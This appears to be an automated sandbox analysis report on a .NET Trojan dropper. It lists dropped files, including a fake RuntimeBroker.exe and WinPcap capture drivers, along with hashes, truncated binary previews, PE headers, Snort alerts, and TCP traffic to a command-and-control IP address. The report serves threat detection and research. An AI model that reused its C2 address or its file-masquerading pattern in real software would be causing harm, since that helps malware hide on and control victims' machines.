SHA-512:	9A763EC1D3E4090C0ECEE5BE9F0D4F6E10C61DFECBC5A443CB259C504814AF43401E6DEC30E290B1635CAD90F7B810B151FCC5D7FD0A8911FDAF3D7633C83CC0
Malicious:	false
Preview:	113.212.88.126..

C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5673816
Entropy (8bit):	7.999175863342044
Encrypted:	true
SSDEEP:	98304:hsPj6quMcylIpk4nM6tmMUrfvEP0hcKju9Z/lTPU8UBHBKNpr1w36ZyY:+PjzDJ4M6tmXDsPKi1lTPmHipJwqL
MD5:	CBE0B05C11D5D523C2AF997D737C137B
SHA1:	027D0C2749EC5EB21B031F46AEE14C905206F482
SHA-256:	C6CD2D3F0B11DC2A604FFDC4DD97861A83B77E21709BA71B962A47759C93F4C8
SHA-512:	75280D721550C2FA19B4F8D42B87D2FC6017F42709D84D2162C7330F7A0338BBD72CDC3F78626B10EDCC602E2D22B174039254824334B3173D0EA48B3C06D1DF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ..............................R.W.......... ...................................................\|V.X........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc.............U.................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7195976
Entropy (8bit):	7.989072583904142
Encrypted:	false
SSDEEP:	196608:yo9OaQ54oYY7jLwXjZ41OON2uk3bQWgtyccMELR:6z5x7jLXkmkU4cFeR
MD5:	4CCF1937068BF8D0773341F86A448634
SHA1:	8CCEF622EC4A5801F787118CE73E9D94D18C975D
SHA-256:	28131174B55F9AE1233F2F9D6BAF9C67C9F31D0B8CA1CF2FDE75E751CDECCCE8
SHA-512:	9C3EAA55A363C311A8B586A8DD9B24346545D57FF363651D624BD76CCBEA97AEFDB6AC15FFA9B0923E3E369DBBC3D7EBF008B150B0DD1F33859B6A7B87FAE6CA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.V...8...8...8.......8.....n.8......8......8...9.I.8.....l.8.......8.......8.......8.Rich..8.................PE..L....._S.....................,.......~............@..........................0.......n...@.................................t!..,........7............m..>......$2......................... ...........@............................................text...t........................... ..`.rdata..............................@..@.data... 0...@.......,..............@....wixburn8............<..............@..@.tls.................>..............@....rsrc....7.......8...@..............@..@.reloc...B.......D...x..............@..B........................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\SysWOW64\Packet.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	98040
Entropy (8bit):	6.127745728436191
Encrypted:	false
SSDEEP:	1536:zg6Z54QkC2wpk2c+ZCDHKklh74RTfIEtaYQ0:M6Z54ARcIxk4LIEtaYj
MD5:	86316BE34481C1ED5B792169312673FD
SHA1:	6CCDE3A8C76879E49B34E4ABB3B8DFAF7A9D77B5
SHA-256:	49656C178B17198470AD6906E9EE0865F16F01C1DBBF11C613B55A07246A7918
SHA-512:	3A6E77C39942B89F3F149E9527AB8A9EB39F55AC18A9DB3A3922DFB294BEB0760D10CA12BE0E3A3854FF7DABBE2DF18C52E3696874623A2A9C5DC74B29A860BC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........H...H...H...oe.Z...oe.j...oe.+......C...H...2...oe..L...oe..I...oe.I...oe..I...RichH...........PE..L...<.0Q...........!.........p......`Q..........................................................................................x....P..T............`.......`..d...................................X...@............................................text...:........................... ..`.rdata...+.......0..................@..@.data....,... ....... ..............@....rsrc...T....P.......0..............@..@.reloc..d....`... ...@..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\ywvz5i8kT9.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23040
Entropy (8bit):	5.5253812475237485
Encrypted:	false
SSDEEP:	384:FUWQD2PvpAI3BL/WaynWrA19NAQ3Wld5KsWbM5yaZ8QU9Dl3RCCmZTpraIDwiFJ:F2D2PvpAQBSnWrA192Q3a/WwnaXqN9aY
MD5:	737DF71F01C8DE6613D9A5F1870A6CB2
SHA1:	BEB44A46961CDB7E5E93A4F98031DCFB54CADE50
SHA-256:	D4EE4EEBFC8E201DA0F924DB48EE7712DCBDFDF11BE3BD552C0AD73616AC7E81
SHA-512:	D74DBB6A3A288B47A38306FD4FDC0D6B38FB5331985290FACA198F16865AF1C56377526055DA9F9B956FE7F4827813F9C229171D1017A2EBEF98D288A8300B16
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Y.r..........."...0..R............... .....@..... ....................................@...@......@............... ...............................................................p..8............................................................ ..H............text...@Q... ...R.................. ..`.rsrc................T..............@..@........................................H........>...2......+....................................................0..`........r...p}.....s....}.....r...p}.....r...p}.....r...p}.....(...........s....s....%.o....o......&..*......=..\.......0............(......r...p(....,...}.....'....r...p.o....(....(...... ....(....+..r/..p.{....rC..p(....}.....(.....s....}.....(...........s....s....%.o....o....s......r...p.{....r...p(....o......4...%.r...p(.....o .......+J..........4...%.r...p(.....o ......{........o!.......o!...o".....&...

C:\Windows\SysWOW64\pthreadVC.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53299
Entropy (8bit):	3.9943496203596918
Encrypted:	false
SSDEEP:	384:hSvfC8Vv0Vy7ojuq7GQcdWTc4zU+GFronD/yD5rBEe0kiH32Jp9AhOW:wt+TGQcdWYdMG59EeJiH3YzW
MD5:	F04A90F917BA10AE2DCBE859870F4DEA
SHA1:	6668EBE373CE58C33017697C477557653427E626
SHA-256:	99C61ABF41C3AEC38CAB3ED6270ADBCA9A247BBF5F9AA9D29ECB0659A5527F48
SHA-512:	AEC29301B9CE311B27F1590B0E0C4121ACDC183A30B570E087D77B7035684F02A6DFBDEE950C37F3023B32E2EA5A075A5FBE6D18A2804DA9490D4959733BB516
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EGi..&...&...&..c9...&...&..7&...9...&...9...&..Rich.&..........................PE..L.....g?...........!.....p...P.......d..............................................................................0...^.......P...............................T...................................................................................text...3f.......p.................. ..`.rdata........... ..................@..@.data...............................@....idata..4...........................@....reloc..J...........................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\wpcap.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	282360
Entropy (8bit):	6.604477037348888
Encrypted:	false
SSDEEP:	6144:E4yIm5rC9WNWwKcNBSCiLvK8+jKgZBwIbg2:jyIm59WwpqCuEKIwv2
MD5:	4633B298D57014627831CCAC89A2C50B
SHA1:	E5F449766722C5C25FA02B065D22A854B6A32A5B
SHA-256:	B967E4DCE952F9232592E4C1753516081438702A53424005642700522055DBC9
SHA-512:	29590FA5F72E6A36F2B72FC2A2CCA35EE41554E13C9995198E740608975621142395D4B2E057DB4314EDF95520FD32AAE8DB066444D8D8DB0FD06C391111C6D3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%I+&a(Eua(Eua(Eu..;uc(EuF.8uv(EuF.+uC(EuF.(u.(EuF.>uc(Eua(Du.(Eu.'.ud(EuF.4ut(EuF.?u`(EuF.9u`(EuF.=u`(EuRicha(Eu........................PE..L.....0Q...........!................z...............................................8_.............................. ...........P....................0..........8&..p...................................@...............,............................text....z.......................... ..`.rdata..=7.......@..................@..@.data...!........ ..................@....rsrc...............................@..@.reloc..p........0..................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\System32\Packet.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	107768
Entropy (8bit):	6.207807273671645
Encrypted:	false
SSDEEP:	3072:xpMSqNrAF/ln2800b4U7kByZo6Fsl1LOb:xpMSq0/AN0EG4yZ/
MD5:	899A5BF1669610CDB78D322AC8D9358B
SHA1:	80A2E420B99FFE294A523C6C6D87ED09DFC8D82B
SHA-256:	AB3CCE674F5216895FD26A073771F82B05D4C8B214A89F0F288A59774A06B14B
SHA-512:	41F2459793AC04E433D8471780E770417AFAC499DC3C5413877D4A4499656C9669C069D24E638D0AAF43AF178A763ACB656FFD34D710EB5E3C94682DB1559056
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5.......5.......5.....n..............5.......5.......5.......5......Rich....................PE..d.....0Q.........." .........t...... l..............................................r................................................\.......P..x.......T.......\....................$............................................... ...............................text...>........................... ..`.rdata...@... ...B..................@..@.data...(7...p.......T..............@....pdata..\............j..............@..@.rsrc...T............\|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Windows\System32\drivers\npf.sys

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36600
Entropy (8bit):	6.293365115285525
Encrypted:	false
SSDEEP:	768:VVRRdUlDRJuOfUhk8ZX2ZeRY4soGLeTZ8wwfKRw:VVRsZREOfUhNK96TZ8wwi6
MD5:	DE7FCC77F4A503AF4CA6A47D49B3713D
SHA1:	8206E2D8374F5E7BF626E47D56D2431EDC939652
SHA-256:	4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6
SHA-512:	FDACE7EE2593FFE5724DB32F4BE62BB13AA1EC89E1E01C713D8C1E9891A5A0975D127450024C3388A987A35E546568ECDBCC60C185DC8F8B08CCEF67A084B20D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}i.}i.}i.}h..}i...}i...}i...}i...}i...}i...}i.Rich.}i.................PE..d.....0Q.........."......V..........................................................9q......................................................d...P....................p...............a...............................................`...............................text....M.......N.................. ..h.rdata.......`.......R..............@..H.data...4....p.......X..............@....pdata...............^..............@..HINIT.................`.............. ....rsrc................h..............@..B.reloc..<............n..............@..B........................................................................................................................................................................................................................................

C:\Windows\System32\wpcap.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	370424
Entropy (8bit):	6.481542014421452
Encrypted:	false
SSDEEP:	6144:pH+VjFreKE0V/NGvaX86tWBXZkbTe/CtjgZBwIV8g/wNmJ4eXk:pH+VBeT0V/NBX8k2YTe/QIwIs8k
MD5:	A672F1CF00FA5AC3F4F59577F77D8C86
SHA1:	B68E64401D91C75CAFA810086A35CD0838C61A4B
SHA-256:	35AAB6CAAAF1720A4D888AE0DE9E2A8E19604F3EA0E4DD882C3EEAE4F39AF117
SHA-512:	A566E7571437BE765279C915DD6E13F72203EFF0DC3838A154FC137ED828E05644D650FD8432D1FB4C1E1D84EE00EF9BDE90225C68C3CA8A5DA349065E7EBFD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5...[...[...[.e.%...[...&...[...5...[...6..[... ...[...Z.d.[.U ...[...*...[...!...[...'...[...#...[.Rich..[.........................PE..d.....0Q.........." ................p........................................P......................................................P4.......'..P....0...........'...........@..X.......................................................X............................text............................... ..`.rdata..mm.......n..................@..@.data........@...&...,..............@....pdata...'.......(...R..............@..@.rsrc........0.......z..............@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.691657258287937
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ywvz5i8kT9.exe
File size:	86016
MD5:	375b713f2e3c2018da424666c6be9059
SHA1:	f3c8a117fa361e2afad77fc90673ab3ca81152f4
SHA256:	7f9c8c44079baed3e635a5d894ddad9c0db48022a19e80af11c79699727de3e0
SHA512:	2da31f51f569c3c7664984c13632ec4c4673612677695df5829d94ae3f3882cb3c94bef8ab924363afe54a3c2ae493308c5dc5617c0e371f1310f6554453938f
SSDEEP:	1536:tP+/8aqQdqLyEK5n1w8+XbNLYVYL3s+ATMm+lT3Lm:xs8afUK5n1T+hLY2L3s+ATMm+lTbm
TLSH:	B9830F9D722072EFC85BD472DEA81D68EA6174BB431F4217A02715ADEE4D897CF240F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!t..........."...0...................... ....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x41c00a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xF07421E8 [Fri Nov 1 11:11:36 2097 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0041C000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc840	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x5b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1c000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0xc000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
&#K':~`s	0x2000	0x8880	0x8a00	False	1.00059442935	data	7.99419306696	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.text	0xc000	0xb780	0xb800	False	0.397354789402	data	4.93711358382	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x5b8	0x600	False	0.416015625	data	4.09264796564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1a000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0x1c000	0x10	0x200	False	0.04296875	data	0.122275881259	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x180a0	0x32c	data
RT_MANIFEST	0x183cc	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2021
Assembly Version	1.0.0.0
InternalName	VvFile.exe
FileVersion	1.0.0.0
CompanyName	VvFile
LegalTrademarks	setup
Comments	VvFile
ProductName	VvFile
ProductVersion	1.0.0.0
FileDescription	VvFile
OriginalFilename	VvFile.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/19/22-16:44:26.306507 04/19/22-16:44:26.306507	TCP	2034340	ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET	49758	80	192.168.2.4	45.135.48.153
04/19/22-16:44:36.911779 04/19/22-16:44:36.911779	TCP	2034340	ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET	49758	80	192.168.2.4	45.135.48.153
04/19/22-16:44:41.532338 04/19/22-16:44:41.532338	TCP	2034340	ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET	49758	80	192.168.2.4	45.135.48.153
04/19/22-16:44:27.387415 04/19/22-16:44:27.387415	TCP	2034340	ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET	49758	80	192.168.2.4	45.135.48.153
04/19/22-16:44:38.649934 04/19/22-16:44:38.649934	TCP	2034340	ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET	49758	80	192.168.2.4	45.135.48.153
04/19/22-16:44:37.995145 04/19/22-16:44:37.995145	TCP	2034340	ET MALWARE Trojan-Dropper.MSIL CnC Traffic - GET	49758	80	192.168.2.4	45.135.48.153

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2022 16:44:26.008328915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.304049015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.304291964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.306507111 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.602826118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.602885008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.602926970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.602967024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.603015900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.603061914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.603100061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.603224039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.603387117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.603427887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.603467941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.603511095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.603540897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.603611946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.603671074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.898639917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.898699999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.898740053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.898791075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.898833036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.898933887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.898983002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.899015903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899141073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899175882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.899275064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899346113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.899386883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899471045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899612904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899672031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.899748087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899797916 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.899869919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899949074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.899997950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.900106907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.900197983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.900249958 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.900271893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.900372982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.900475025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:26.900486946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.900625944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:26.900681973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:27.194490910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:27.194591999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:27.194632053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:27.194673061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:27.194705963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:27.194719076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:27.194773912 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:27.274219036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:27.387414932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:27.683156013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:27.683187962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:27.683352947 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:36.911778927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.207844973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.207879066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.207895041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.207912922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.207983971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208024979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.208080053 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.208146095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208214045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.208221912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208302975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208425045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208477020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.208535910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208581924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.208662033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208803892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208854914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.208904982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.208986044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.209033012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.209104061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.209216118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.209335089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.209374905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:37.209383965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:37.209413052 CEST	49758	80	192.168.2.4	45.135.48.153
